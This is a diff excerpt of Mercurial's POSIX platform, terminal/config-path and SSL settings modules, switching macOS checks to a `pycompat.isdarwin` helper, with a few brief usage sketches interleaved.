171 171 Requires a directory (like /foo/.hg)
172 172 """
173 173
174 174 # VFAT on some Linux versions can flip the mode, but the change does
175 175 # not persist across a FS remount. Frequently we can detect it if
176 176 # files are created with the exec bit on.
177 177
178 178 try:
179 179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
180 180 cachedir = os.path.join(path, '.hg', 'cache')
181 181 if os.path.isdir(cachedir):
182 182 checkisexec = os.path.join(cachedir, 'checkisexec')
183 183 checknoexec = os.path.join(cachedir, 'checknoexec')
184 184
185 185 try:
186 186 m = os.stat(checkisexec).st_mode
187 187 except OSError as e:
188 188 if e.errno != errno.ENOENT:
189 189 raise
190 190 # checkisexec does not exist - fall through ...
191 191 else:
192 192 # checkisexec exists, check if it actually is exec
193 193 if m & EXECFLAGS != 0:
194 194 # ensure checknoexec exists, check it isn't exec
195 195 try:
196 196 m = os.stat(checknoexec).st_mode
197 197 except OSError as e:
198 198 if e.errno != errno.ENOENT:
199 199 raise
200 200 open(checknoexec, 'w').close() # might fail
201 201 m = os.stat(checknoexec).st_mode
202 202 if m & EXECFLAGS == 0:
203 203 # check-exec is exec and check-no-exec is not exec
204 204 return True
205 205 # checknoexec exists but is exec - delete it
206 206 unlink(checknoexec)
207 207 # checkisexec exists but is not exec - delete it
208 208 unlink(checkisexec)
209 209
210 210 # check using one file, leave it as checkisexec
211 211 checkdir = cachedir
212 212 else:
213 213 # check directly in path and don't leave checkisexec behind
214 214 checkdir = path
215 215 checkisexec = None
216 216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
217 217 try:
218 218 os.close(fh)
219 219 m = os.stat(fn).st_mode
220 220 if m & EXECFLAGS == 0:
221 221 os.chmod(fn, m & 0o777 | EXECFLAGS)
222 222 if os.stat(fn).st_mode & EXECFLAGS != 0:
223 223 if checkisexec is not None:
224 224 os.rename(fn, checkisexec)
225 225 fn = None
226 226 return True
227 227 finally:
228 228 if fn is not None:
229 229 unlink(fn)
230 230 except (IOError, OSError):
231 231 # we don't care, the user probably won't be able to commit anyway
232 232 return False
233 233
234 234 def checklink(path):
235 235 """check whether the given path is on a symlink-capable filesystem"""
236 236 # mktemp is not racy because symlink creation will fail if the
237 237 # file already exists
238 238 while True:
239 239 cachedir = os.path.join(path, '.hg', 'cache')
240 240 checklink = os.path.join(cachedir, 'checklink')
241 241 # try fast path, read only
242 242 if os.path.islink(checklink):
243 243 return True
244 244 if os.path.isdir(cachedir):
245 245 checkdir = cachedir
246 246 else:
247 247 checkdir = path
248 248 cachedir = None
249 249 fscheckdir = pycompat.fsdecode(checkdir)
250 250 name = tempfile.mktemp(dir=fscheckdir,
251 251 prefix=r'checklink-')
252 252 name = pycompat.fsencode(name)
253 253 try:
254 254 fd = None
255 255 if cachedir is None:
256 256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
257 257 prefix=r'hg-checklink-')
258 258 target = pycompat.fsencode(os.path.basename(fd.name))
259 259 else:
260 260 # create a fixed file to link to; doesn't matter if it
261 261 # already exists.
262 262 target = 'checklink-target'
263 263 try:
264 264 open(os.path.join(cachedir, target), 'w').close()
265 265 except IOError as inst:
266 266 if inst[0] == errno.EACCES:
267 267 # If we can't write to cachedir, just pretend
268 268 # that the fs is readonly and by association
269 269 # that the fs won't support symlinks. This
270 270 # seems like the least dangerous way to avoid
271 271 # data loss.
272 272 return False
273 273 raise
274 274 try:
275 275 os.symlink(target, name)
276 276 if cachedir is None:
277 277 unlink(name)
278 278 else:
279 279 try:
280 280 os.rename(name, checklink)
281 281 except OSError:
282 282 unlink(name)
283 283 return True
284 284 except OSError as inst:
285 285 # link creation might race, try again
286 286 if inst[0] == errno.EEXIST:
287 287 continue
288 288 raise
289 289 finally:
290 290 if fd is not None:
291 291 fd.close()
292 292 except AttributeError:
293 293 return False
294 294 except OSError as inst:
295 295 # sshfs might report failure while successfully creating the link
296 296 if inst[0] == errno.EIO and os.path.exists(name):
297 297 unlink(name)
298 298 return False
299 299
300 300 def checkosfilename(path):
301 301 '''Check that the base-relative path is a valid filename on this platform.
302 302 Returns None if the path is ok, or a UI string describing the problem.'''
303 303 return None # on posix platforms, every path is ok
304 304
305 305 def setbinary(fd):
306 306 pass
307 307
308 308 def pconvert(path):
309 309 return path
310 310
311 311 def localpath(path):
312 312 return path
313 313
314 314 def samefile(fpath1, fpath2):
315 315 """Returns whether path1 and path2 refer to the same file. This is only
316 316 guaranteed to work for files, not directories."""
317 317 return os.path.samefile(fpath1, fpath2)
318 318
319 319 def samedevice(fpath1, fpath2):
320 320 """Returns whether fpath1 and fpath2 are on the same device. This is only
321 321 guaranteed to work for files, not directories."""
322 322 st1 = os.lstat(fpath1)
323 323 st2 = os.lstat(fpath2)
324 324 return st1.st_dev == st2.st_dev
325 325
326 326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
327 327 def normcase(path):
328 328 return path.lower()
329 329
330 330 # what normcase does to ASCII strings
331 331 normcasespec = encoding.normcasespecs.lower
332 332 # fallback normcase function for non-ASCII strings
333 333 normcasefallback = normcase
334 334
335 if pycompat.sysplatform == 'darwin':
335 if pycompat.isdarwin:
336 336
337 337 def normcase(path):
338 338 '''
339 339 Normalize a filename for OS X-compatible comparison:
340 340 - escape-encode invalid characters
341 341 - decompose to NFD
342 342 - lowercase
343 343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f, feff]
344 344
345 345 >>> normcase(b'UPPER')
346 346 'upper'
347 347 >>> normcase(b'Caf\\xc3\\xa9')
348 348 'cafe\\xcc\\x81'
349 349 >>> normcase(b'\\xc3\\x89')
350 350 'e\\xcc\\x81'
351 351 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
352 352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
353 353 '''
354 354
355 355 try:
356 356 return encoding.asciilower(path) # exception for non-ASCII
357 357 except UnicodeDecodeError:
358 358 return normcasefallback(path)
359 359
360 360 normcasespec = encoding.normcasespecs.lower
361 361
362 362 def normcasefallback(path):
363 363 try:
364 364 u = path.decode('utf-8')
365 365 except UnicodeDecodeError:
366 366 # OS X percent-encodes any bytes that aren't valid utf-8
367 367 s = ''
368 368 pos = 0
369 369 l = len(path)
370 370 while pos < l:
371 371 try:
372 372 c = encoding.getutf8char(path, pos)
373 373 pos += len(c)
374 374 except ValueError:
375 375 c = '%%%02X' % ord(path[pos:pos + 1])
376 376 pos += 1
377 377 s += c
378 378
379 379 u = s.decode('utf-8')
380 380
381 381 # Decompose then lowercase (HFS+ technote specifies lower)
382 382 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
383 383 # drop HFS+ ignored characters
384 384 return encoding.hfsignoreclean(enc)
385 385
386 386 if pycompat.sysplatform == 'cygwin':
387 387 # workaround for cygwin, in which the mount point part of a path is
388 388 # treated as case sensitive, even though the underlying NTFS is case
389 389 # insensitive.
390 390
391 391 # default mount points
392 392 cygwinmountpoints = sorted([
393 393 "/usr/bin",
394 394 "/usr/lib",
395 395 "/cygdrive",
396 396 ], reverse=True)
397 397
398 398 # use uppercasing as normcase, the same as the NTFS workaround
399 399 def normcase(path):
400 400 pathlen = len(path)
401 401 if (pathlen == 0) or (path[0] != pycompat.ossep):
402 402 # treat as relative
403 403 return encoding.upper(path)
404 404
405 405 # to preserve case of mountpoint part
406 406 for mp in cygwinmountpoints:
407 407 if not path.startswith(mp):
408 408 continue
409 409
410 410 mplen = len(mp)
411 411 if mplen == pathlen: # mount point itself
412 412 return mp
413 413 if path[mplen] == pycompat.ossep:
414 414 return mp + encoding.upper(path[mplen:])
415 415
416 416 return encoding.upper(path)
417 417
418 418 normcasespec = encoding.normcasespecs.other
419 419 normcasefallback = normcase
420 420
421 421 # Cygwin translates native ACLs to POSIX permissions,
422 422 # but these translations are not supported by native
423 423 # tools, so the exec bit tends to be set erroneously.
424 424 # Therefore, disable executable bit access on Cygwin.
425 425 def checkexec(path):
426 426 return False
427 427
428 428 # Similarly, Cygwin's symlink emulation is likely to create
429 429 # problems when Mercurial is used from both Cygwin and native
430 430 # Windows, with other native tools, or on shared volumes
431 431 def checklink(path):
432 432 return False
433 433
434 434 _needsshellquote = None
435 435 def shellquote(s):
436 436 if pycompat.sysplatform == 'OpenVMS':
437 437 return '"%s"' % s
438 438 global _needsshellquote
439 439 if _needsshellquote is None:
440 440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
441 441 if s and not _needsshellquote(s):
442 442 # "s" shouldn't have to be quoted
443 443 return s
444 444 else:
445 445 return "'%s'" % s.replace("'", "'\\''")
446 446
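The quoting rule is the classic POSIX single-quote dance; a short sketch of the values the code above computes::

    shellquote('plain_token.1')  # -> 'plain_token.1' (no quoting needed)
    shellquote("it's")           # -> "'it'\\''s'" as a Python literal
    shellquote('')               # -> "''"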
447 447 def quotecommand(cmd):
448 448 return cmd
449 449
450 450 def popen(command, mode='r'):
451 451 return os.popen(command, mode)
452 452
453 453 def testpid(pid):
454 454 '''return False if pid dead, True if running or not sure'''
455 455 if pycompat.sysplatform == 'OpenVMS':
456 456 return True
457 457 try:
458 458 os.kill(pid, 0)
459 459 return True
460 460 except OSError as inst:
461 461 return inst.errno != errno.ESRCH
462 462
463 463 def explainexit(code):
464 464 """return a 2-tuple (desc, code) describing a subprocess status
465 465 (codes from kill are negative - not os.system/wait encoding)"""
466 466 if code >= 0:
467 467 return _("exited with status %d") % code, code
468 468 return _("killed by signal %d") % -code, -code
469 469
470 470 def isowner(st):
471 471 """Return True if the stat object st is from the current user."""
472 472 return st.st_uid == os.getuid()
473 473
474 474 def findexe(command):
475 475 '''Find the executable for command, searching the way 'which' does.
476 476 If command is a basename then PATH is searched for command.
477 477 PATH isn't searched if command is an absolute or relative path.
478 478 If command isn't found None is returned.'''
479 479 if pycompat.sysplatform == 'OpenVMS':
480 480 return command
481 481
482 482 def findexisting(executable):
483 483 'Return executable if it is an existing, executable file'
484 484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
485 485 return executable
486 486 return None
487 487
488 488 if pycompat.ossep in command:
489 489 return findexisting(command)
490 490
491 491 if pycompat.sysplatform == 'plan9':
492 492 return findexisting(os.path.join('/bin', command))
493 493
494 494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
495 495 executable = findexisting(os.path.join(path, command))
496 496 if executable is not None:
497 497 return executable
498 498 return None
499 499
500 500 def setsignalhandler():
501 501 pass
502 502
503 503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
504 504
505 505 def statfiles(files):
506 506 '''Stat each file in files. Yield each stat, or None if a file does not
507 507 exist or has a type we don't care about.'''
508 508 lstat = os.lstat
509 509 getkind = stat.S_IFMT
510 510 for nf in files:
511 511 try:
512 512 st = lstat(nf)
513 513 if getkind(st.st_mode) not in _wantedkinds:
514 514 st = None
515 515 except OSError as err:
516 516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
517 517 raise
518 518 st = None
519 519 yield st
520 520
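A small sketch of the contract, using hypothetical paths: regular files and symlinks yield a stat result, everything else (missing paths, devices, directories we don't care about) yields None::

    for st in statfiles([b'README', b'no-such-file', b'/dev/null']):
        print(st and st.st_size)  # None for the missing path and the device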
521 521 def getuser():
522 522 '''return name of current user'''
523 523 return pycompat.fsencode(getpass.getuser())
524 524
525 525 def username(uid=None):
526 526 """Return the name of the user with the given uid.
527 527
528 528 If uid is None, return the name of the current user."""
529 529
530 530 if uid is None:
531 531 uid = os.getuid()
532 532 try:
533 533 return pwd.getpwuid(uid)[0]
534 534 except KeyError:
535 535 return str(uid)
536 536
537 537 def groupname(gid=None):
538 538 """Return the name of the group with the given gid.
539 539
540 540 If gid is None, return the name of the current group."""
541 541
542 542 if gid is None:
543 543 gid = os.getgid()
544 544 try:
545 545 return grp.getgrgid(gid)[0]
546 546 except KeyError:
547 547 return str(gid)
548 548
549 549 def groupmembers(name):
550 550 """Return the list of members of the group with the given
551 551 name, raising KeyError if the group does not exist.
552 552 """
553 553 return list(grp.getgrnam(name).gr_mem)
554 554
555 555 def spawndetached(args):
556 556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
557 557 args[0], args)
558 558
559 559 def gethgcmd():
560 560 return sys.argv[:1]
561 561
562 562 def makedir(path, notindexed):
563 563 os.mkdir(path)
564 564
565 565 def lookupreg(key, name=None, scope=None):
566 566 return None
567 567
568 568 def hidewindow():
569 569 """Hide current shell window.
570 570
571 571 Used to hide the window opened when starting asynchronous
572 572 child process under Windows, unneeded on other systems.
573 573 """
574 574 pass
575 575
576 576 class cachestat(object):
577 577 def __init__(self, path):
578 578 self.stat = os.stat(path)
579 579
580 580 def cacheable(self):
581 581 return bool(self.stat.st_ino)
582 582
583 583 __hash__ = object.__hash__
584 584
585 585 def __eq__(self, other):
586 586 try:
587 587 # Only dev, ino, size, mtime and atime are likely to change. Out
588 588 # of these, we shouldn't compare atime but should compare the
589 589 # rest. However, one of the other fields changing indicates
590 590 # something fishy going on, so return False if anything but atime
591 591 # changes.
592 592 return (self.stat.st_mode == other.stat.st_mode and
593 593 self.stat.st_ino == other.stat.st_ino and
594 594 self.stat.st_dev == other.stat.st_dev and
595 595 self.stat.st_nlink == other.stat.st_nlink and
596 596 self.stat.st_uid == other.stat.st_uid and
597 597 self.stat.st_gid == other.stat.st_gid and
598 598 self.stat.st_size == other.stat.st_size and
599 599 self.stat.st_mtime == other.stat.st_mtime and
600 600 self.stat.st_ctime == other.stat.st_ctime)
601 601 except AttributeError:
602 602 return False
603 603
604 604 def __ne__(self, other):
605 605 return not self == other
606 606
607 607 def executablepath():
608 608 return None # available on Windows only
609 609
610 610 def statislink(st):
611 611 '''check whether a stat result is a symlink'''
612 612 return st and stat.S_ISLNK(st.st_mode)
613 613
614 614 def statisexec(st):
615 615 '''check whether a stat result is an executable file'''
616 616 return st and (st.st_mode & 0o100 != 0)
617 617
618 618 def poll(fds):
619 619 """block until something happens on any file descriptor
620 620
621 621 This is a generic helper that will check for any activity
622 622 (read, write, exception) and return the list of touched files.
623 623
624 624 In unsupported cases, it will raise a NotImplementedError"""
625 625 try:
626 626 while True:
627 627 try:
628 628 res = select.select(fds, fds, fds)
629 629 break
630 630 except select.error as inst:
631 631 if inst.args[0] == errno.EINTR:
632 632 continue
633 633 raise
634 634 except ValueError: # out of range file descriptor
635 635 raise NotImplementedError()
636 636 return sorted(list(set(sum(res, []))))
637 637
638 638 def readpipe(pipe):
639 639 """Read all available data from a pipe."""
640 640 # We can't fstat() a pipe because Linux will always report 0.
641 641 # So, we set the pipe to non-blocking mode and read everything
642 642 # that's available.
643 643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
644 644 flags |= os.O_NONBLOCK
645 645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
646 646
647 647 try:
648 648 chunks = []
649 649 while True:
650 650 try:
651 651 s = pipe.read()
652 652 if not s:
653 653 break
654 654 chunks.append(s)
655 655 except IOError:
656 656 break
657 657
658 658 return ''.join(chunks)
659 659 finally:
660 660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
661 661
662 662 def bindunixsocket(sock, path):
663 663 """Bind the UNIX domain socket to the specified path"""
664 664 # use relative path instead of full path at bind() if possible, since
665 665 # AF_UNIX path has very small length limit (107 chars) on common
666 666 # platforms (see sys/un.h)
667 667 dirname, basename = os.path.split(path)
668 668 bakwdfd = None
669 669 if dirname:
670 670 bakwdfd = os.open('.', os.O_DIRECTORY)
671 671 os.chdir(dirname)
672 672 sock.bind(basename)
673 673 if bakwdfd:
674 674 os.fchdir(bakwdfd)
675 675 os.close(bakwdfd)
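A usage sketch with a hypothetical path, showing why the chdir trick matters: only the basename has to fit within sun_path's ~107-byte limit::

    import socket

    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    bindunixsocket(sock, '/a/very/deeply/nested/runtime/dir/hg-cmdserver.sock')
    sock.listen(1)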
@@ -1,85 +1,85 b''
1 1 from __future__ import absolute_import
2 2
3 3 import array
4 4 import errno
5 5 import fcntl
6 6 import os
7 7 import sys
8 8
9 9 from . import (
10 10 encoding,
11 11 pycompat,
12 12 util,
13 13 )
14 14
15 15 # BSD 'more' escapes ANSI color sequences by default. This can be disabled by
16 16 # $MORE variable, but there's no compatible option with Linux 'more'. Given
17 17 # OS X is widely used and most modern Unix systems would have 'less', setting
18 18 # 'less' as the default seems reasonable.
19 19 fallbackpager = 'less'
20 20
21 21 def _rcfiles(path):
22 22 rcs = [os.path.join(path, 'hgrc')]
23 23 rcdir = os.path.join(path, 'hgrc.d')
24 24 try:
25 25 rcs.extend([os.path.join(rcdir, f)
26 26 for f, kind in util.listdir(rcdir)
27 27 if f.endswith(".rc")])
28 28 except OSError:
29 29 pass
30 30 return rcs
31 31
32 32 def systemrcpath():
33 33 path = []
34 34 if pycompat.sysplatform == 'plan9':
35 35 root = 'lib/mercurial'
36 36 else:
37 37 root = 'etc/mercurial'
38 38 # old mod_python does not set sys.argv
39 39 if len(getattr(sys, 'argv', [])) > 0:
40 40 p = os.path.dirname(os.path.dirname(pycompat.sysargv[0]))
41 41 if p != '/':
42 42 path.extend(_rcfiles(os.path.join(p, root)))
43 43 path.extend(_rcfiles('/' + root))
44 44 return path
45 45
46 46 def userrcpath():
47 47 if pycompat.sysplatform == 'plan9':
48 48 return [encoding.environ['home'] + '/lib/hgrc']
49 elif pycompat.sysplatform == 'darwin':
49 elif pycompat.isdarwin:
50 50 return [os.path.expanduser('~/.hgrc')]
51 51 else:
52 52 confighome = encoding.environ.get('XDG_CONFIG_HOME')
53 53 if confighome is None or not os.path.isabs(confighome):
54 54 confighome = os.path.expanduser('~/.config')
55 55
56 56 return [os.path.expanduser('~/.hgrc'),
57 57 os.path.join(confighome, 'hg', 'hgrc')]
58 58
59 59 def termsize(ui):
60 60 try:
61 61 import termios
62 62 TIOCGWINSZ = termios.TIOCGWINSZ # unavailable on IRIX (issue3449)
63 63 except (AttributeError, ImportError):
64 64 return 80, 24
65 65
66 66 for dev in (ui.ferr, ui.fout, ui.fin):
67 67 try:
68 68 try:
69 69 fd = dev.fileno()
70 70 except AttributeError:
71 71 continue
72 72 if not os.isatty(fd):
73 73 continue
74 74 arri = fcntl.ioctl(fd, TIOCGWINSZ, '\0' * 8)
75 75 height, width = array.array(r'h', arri)[:2]
76 76 if width > 0 and height > 0:
77 77 return width, height
78 78 except ValueError:
79 79 pass
80 80 except IOError as e:
81 81 if e[0] == errno.EINVAL:
82 82 pass
83 83 else:
84 84 raise
85 85 return 80, 24
@@ -1,865 +1,865 b''
1 1 # sslutil.py - SSL handling for mercurial
2 2 #
3 3 # Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
4 4 # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 from __future__ import absolute_import
11 11
12 12 import hashlib
13 13 import os
14 14 import re
15 15 import ssl
16 16
17 17 from .i18n import _
18 18 from . import (
19 19 error,
20 20 pycompat,
21 21 util,
22 22 )
23 23
24 24 # Python 2.7.9+ overhauled the built-in SSL/TLS features of Python. It added
25 25 # support for TLS 1.1, TLS 1.2, SNI, system CA stores, etc. These features are
26 26 # all exposed via the "ssl" module.
27 27 #
28 28 # Depending on the version of Python being used, SSL/TLS support is either
29 29 # modern/secure or legacy/insecure. Many operations in this module have
30 30 # separate code paths depending on support in Python.
31 31
32 32 configprotocols = {
33 33 'tls1.0',
34 34 'tls1.1',
35 35 'tls1.2',
36 36 }
37 37
38 38 hassni = getattr(ssl, 'HAS_SNI', False)
39 39
40 40 # TLS 1.1 and 1.2 may not be supported if the OpenSSL Python is compiled
41 41 # against doesn't support them.
42 42 supportedprotocols = {'tls1.0'}
43 43 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_1'):
44 44 supportedprotocols.add('tls1.1')
45 45 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_2'):
46 46 supportedprotocols.add('tls1.2')
47 47
48 48 try:
49 49 # ssl.SSLContext was added in 2.7.9 and presence indicates modern
50 50 # SSL/TLS features are available.
51 51 SSLContext = ssl.SSLContext
52 52 modernssl = True
53 53 _canloaddefaultcerts = util.safehasattr(SSLContext, 'load_default_certs')
54 54 except AttributeError:
55 55 modernssl = False
56 56 _canloaddefaultcerts = False
57 57
58 58 # We implement SSLContext using the interface from the standard library.
59 59 class SSLContext(object):
60 60 def __init__(self, protocol):
61 61 # From the public interface of SSLContext
62 62 self.protocol = protocol
63 63 self.check_hostname = False
64 64 self.options = 0
65 65 self.verify_mode = ssl.CERT_NONE
66 66
67 67 # Used by our implementation.
68 68 self._certfile = None
69 69 self._keyfile = None
70 70 self._certpassword = None
71 71 self._cacerts = None
72 72 self._ciphers = None
73 73
74 74 def load_cert_chain(self, certfile, keyfile=None, password=None):
75 75 self._certfile = certfile
76 76 self._keyfile = keyfile
77 77 self._certpassword = password
78 78
79 79 def load_default_certs(self, purpose=None):
80 80 pass
81 81
82 82 def load_verify_locations(self, cafile=None, capath=None, cadata=None):
83 83 if capath:
84 84 raise error.Abort(_('capath not supported'))
85 85 if cadata:
86 86 raise error.Abort(_('cadata not supported'))
87 87
88 88 self._cacerts = cafile
89 89
90 90 def set_ciphers(self, ciphers):
91 91 self._ciphers = ciphers
92 92
93 93 def wrap_socket(self, socket, server_hostname=None, server_side=False):
94 94 # server_hostname is unique to SSLContext.wrap_socket and is used
95 95 # for SNI in that context. So there's nothing for us to do with it
96 96 # in this legacy code since we don't support SNI.
97 97
98 98 args = {
99 99 'keyfile': self._keyfile,
100 100 'certfile': self._certfile,
101 101 'server_side': server_side,
102 102 'cert_reqs': self.verify_mode,
103 103 'ssl_version': self.protocol,
104 104 'ca_certs': self._cacerts,
105 105 'ciphers': self._ciphers,
106 106 }
107 107
108 108 return ssl.wrap_socket(socket, **args)
109 109
110 110 def _hostsettings(ui, hostname):
111 111 """Obtain security settings for a hostname.
112 112
113 113 Returns a dict of settings relevant to that hostname.
114 114 """
115 115 s = {
116 116 # Whether we should attempt to load default/available CA certs
117 117 # if an explicit ``cafile`` is not defined.
118 118 'allowloaddefaultcerts': True,
119 119 # List of 2-tuple of (hash algorithm, hash).
120 120 'certfingerprints': [],
121 121 # Path to file containing concatenated CA certs. Used by
122 122 # SSLContext.load_verify_locations().
123 123 'cafile': None,
124 124 # Whether certificate verification should be disabled.
125 125 'disablecertverification': False,
126 126 # Whether the legacy [hostfingerprints] section has data for this host.
127 127 'legacyfingerprint': False,
128 128 # PROTOCOL_* constant to use for SSLContext.__init__.
129 129 'protocol': None,
130 130 # String representation of minimum protocol to be used for UI
131 131 # presentation.
132 132 'protocolui': None,
133 133 # ssl.CERT_* constant used by SSLContext.verify_mode.
134 134 'verifymode': None,
135 135 # Defines extra ssl.OP* bitwise options to set.
136 136 'ctxoptions': None,
137 137 # OpenSSL Cipher List to use (instead of default).
138 138 'ciphers': None,
139 139 }
140 140
141 141 # Allow minimum TLS protocol to be specified in the config.
142 142 def validateprotocol(protocol, key):
143 143 if protocol not in configprotocols:
144 144 raise error.Abort(
145 145 _('unsupported protocol from hostsecurity.%s: %s') %
146 146 (key, protocol),
147 147 hint=_('valid protocols: %s') %
148 148 ' '.join(sorted(configprotocols)))
149 149
150 150 # We default to TLS 1.1+ where we can because TLS 1.0 has known
151 151 # vulnerabilities (like BEAST and POODLE). We allow users to downgrade to
152 152 # TLS 1.0+ via config options in case a legacy server is encountered.
153 153 if 'tls1.1' in supportedprotocols:
154 154 defaultprotocol = 'tls1.1'
155 155 else:
156 156 # Let people know they are borderline secure.
157 157 # We don't document this config option because we want people to see
158 158 # the bold warnings on the web site.
159 159 # internal config: hostsecurity.disabletls10warning
160 160 if not ui.configbool('hostsecurity', 'disabletls10warning'):
161 161 ui.warn(_('warning: connecting to %s using legacy security '
162 162 'technology (TLS 1.0); see '
163 163 'https://mercurial-scm.org/wiki/SecureConnections for '
164 164 'more info\n') % hostname)
165 165 defaultprotocol = 'tls1.0'
166 166
167 167 key = 'minimumprotocol'
168 168 protocol = ui.config('hostsecurity', key, defaultprotocol)
169 169 validateprotocol(protocol, key)
170 170
171 171 key = '%s:minimumprotocol' % hostname
172 172 protocol = ui.config('hostsecurity', key, protocol)
173 173 validateprotocol(protocol, key)
174 174
175 175 # If --insecure is used, we allow the use of TLS 1.0 despite config options.
176 176 # We always print a "connection security to %s is disabled..." message when
177 177 # --insecure is used. So no need to print anything more here.
178 178 if ui.insecureconnections:
179 179 protocol = 'tls1.0'
180 180
181 181 s['protocol'], s['ctxoptions'], s['protocolui'] = protocolsettings(protocol)
182 182
183 183 ciphers = ui.config('hostsecurity', 'ciphers')
184 184 ciphers = ui.config('hostsecurity', '%s:ciphers' % hostname, ciphers)
185 185 s['ciphers'] = ciphers
186 186
187 187 # Look for fingerprints in [hostsecurity] section. Value is a list
188 188 # of <alg>:<fingerprint> strings.
189 189 fingerprints = ui.configlist('hostsecurity', '%s:fingerprints' % hostname,
190 190 [])
191 191 for fingerprint in fingerprints:
192 192 if not (fingerprint.startswith(('sha1:', 'sha256:', 'sha512:'))):
193 193 raise error.Abort(_('invalid fingerprint for %s: %s') % (
194 194 hostname, fingerprint),
195 195 hint=_('must begin with "sha1:", "sha256:", '
196 196 'or "sha512:"'))
197 197
198 198 alg, fingerprint = fingerprint.split(':', 1)
199 199 fingerprint = fingerprint.replace(':', '').lower()
200 200 s['certfingerprints'].append((alg, fingerprint))
201 201
202 202 # Fingerprints from [hostfingerprints] are always SHA-1.
203 203 for fingerprint in ui.configlist('hostfingerprints', hostname, []):
204 204 fingerprint = fingerprint.replace(':', '').lower()
205 205 s['certfingerprints'].append(('sha1', fingerprint))
206 206 s['legacyfingerprint'] = True
207 207
208 208 # If a host cert fingerprint is defined, it is the only thing that
209 209 # matters. No need to validate CA certs.
210 210 if s['certfingerprints']:
211 211 s['verifymode'] = ssl.CERT_NONE
212 212 s['allowloaddefaultcerts'] = False
213 213
214 214 # If --insecure is used, don't take CAs into consideration.
215 215 elif ui.insecureconnections:
216 216 s['disablecertverification'] = True
217 217 s['verifymode'] = ssl.CERT_NONE
218 218 s['allowloaddefaultcerts'] = False
219 219
220 220 if ui.configbool('devel', 'disableloaddefaultcerts'):
221 221 s['allowloaddefaultcerts'] = False
222 222
223 223 # If both fingerprints and a per-host ca file are specified, issue a warning
224 224 # because users should not be surprised about what security is or isn't
225 225 # being performed.
226 226 cafile = ui.config('hostsecurity', '%s:verifycertsfile' % hostname)
227 227 if s['certfingerprints'] and cafile:
228 228 ui.warn(_('(hostsecurity.%s:verifycertsfile ignored when host '
229 229 'fingerprints defined; using host fingerprints for '
230 230 'verification)\n') % hostname)
231 231
232 232 # Try to hook up CA certificate validation unless something above
233 233 # makes it not necessary.
234 234 if s['verifymode'] is None:
235 235 # Look at per-host ca file first.
236 236 if cafile:
237 237 cafile = util.expandpath(cafile)
238 238 if not os.path.exists(cafile):
239 239 raise error.Abort(_('path specified by %s does not exist: %s') %
240 240 ('hostsecurity.%s:verifycertsfile' % hostname,
241 241 cafile))
242 242 s['cafile'] = cafile
243 243 else:
244 244 # Find global certificates file in config.
245 245 cafile = ui.config('web', 'cacerts')
246 246
247 247 if cafile:
248 248 cafile = util.expandpath(cafile)
249 249 if not os.path.exists(cafile):
250 250 raise error.Abort(_('could not find web.cacerts: %s') %
251 251 cafile)
252 252 elif s['allowloaddefaultcerts']:
253 253 # CAs not defined in config. Try to find system bundles.
254 254 cafile = _defaultcacerts(ui)
255 255 if cafile:
256 256 ui.debug('using %s for CA file\n' % cafile)
257 257
258 258 s['cafile'] = cafile
259 259
260 260 # Require certificate validation if CA certs are being loaded and
261 261 # verification hasn't been disabled above.
262 262 if cafile or (_canloaddefaultcerts and s['allowloaddefaultcerts']):
263 263 s['verifymode'] = ssl.CERT_REQUIRED
264 264 else:
265 265 # At this point we don't have a fingerprint, aren't being
266 266 # explicitly insecure, and can't load CA certs. Connecting
267 267 # is insecure. We allow the connection and abort during
268 268 # validation (once we have the fingerprint to print to the
269 269 # user).
270 270 s['verifymode'] = ssl.CERT_NONE
271 271
272 272 assert s['protocol'] is not None
273 273 assert s['ctxoptions'] is not None
274 274 assert s['verifymode'] is not None
275 275
276 276 return s
277 277
278 278 def protocolsettings(protocol):
279 279 """Resolve the protocol for a config value.
280 280
281 281 Returns a 3-tuple of (protocol, options, ui value) where the first
282 282 2 items are values used by SSLContext and the last is a string value
283 283 of the ``minimumprotocol`` config option equivalent.
284 284 """
285 285 if protocol not in configprotocols:
286 286 raise ValueError('protocol value not supported: %s' % protocol)
287 287
288 288 # Despite its name, PROTOCOL_SSLv23 selects the highest protocol
289 289 # that both ends support, including TLS protocols. On legacy stacks,
290 290 # the highest it likely goes is TLS 1.0. On modern stacks, it can
291 291 # support TLS 1.2.
292 292 #
293 293 # The PROTOCOL_TLSv* constants select a specific TLS version
294 294 # only (as opposed to multiple versions). So the method for
295 295 # supporting multiple TLS versions is to use PROTOCOL_SSLv23 and
296 296 # disable protocols via SSLContext.options and OP_NO_* constants.
297 297 # However, SSLContext.options doesn't work unless we have the
298 298 # full/real SSLContext available to us.
299 299 if supportedprotocols == {'tls1.0'}:
300 300 if protocol != 'tls1.0':
301 301 raise error.Abort(_('current Python does not support protocol '
302 302 'setting %s') % protocol,
303 303 hint=_('upgrade Python or disable setting since '
304 304 'only TLS 1.0 is supported'))
305 305
306 306 return ssl.PROTOCOL_TLSv1, 0, 'tls1.0'
307 307
308 308 # WARNING: returned options don't work unless the modern ssl module
309 309 # is available. Be careful when adding options here.
310 310
